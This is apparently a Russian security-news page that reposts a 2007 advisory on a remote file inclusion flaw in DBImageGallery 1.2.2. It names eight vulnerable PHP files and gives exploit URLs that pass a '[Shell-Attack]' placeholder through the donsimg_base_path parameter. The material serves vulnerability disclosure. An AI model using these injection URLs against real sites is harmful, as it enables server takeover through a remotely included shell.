Дополнительная информация Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl ) BJ Webring XSS Tyger Bug Tracking System Multiple Vulnerability WordPress source code compromised to enable remote code execution From:RaeD Hasadya <raed_(at)_bsdmail.com> Date:3 марта 2007 г.Subject:Remote File Include In DBImageGalleryRemote File Include In DBImageGallery 1.2.2 Discovered By : Hasadya Raed Contact Me : RaeD@BsdMail.Com Download Script : http://www.dbscripts.net/download/?file=1 B.Files: admin/attributes.php -> require_once $donsimg_base_path admin/images.php -> require_once $donsimg_base_path admin/scan.php -> require_once $donsimg_base_path includes/attributes.php -> require_once $donsimg_base_path includes/db_utils.php -> require_once $donsimg_base_path includes/images.php -> require_once $donsimg_base_path includes/utils.php -> require_once $donsimg_base_path includes/values.php -> require_once $donsimg_base_path Exploits : http://www.victim.com/path/admin/attributes.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/admin/images.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/admin/scan.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/attributes.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/db_utils.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/images.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/utils.php?donsimg_base_path=[Shell-Attack] http://www.victim.com/path/includes/values.php?donsimg_base_path=[Shell-Attack] -- _______________________________________________ Get your free email from http://bsdmail.com
Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
BJ Webring XSS
Tyger Bug Tracking System Multiple Vulnerability
WordPress source code compromised to enable remote code execution
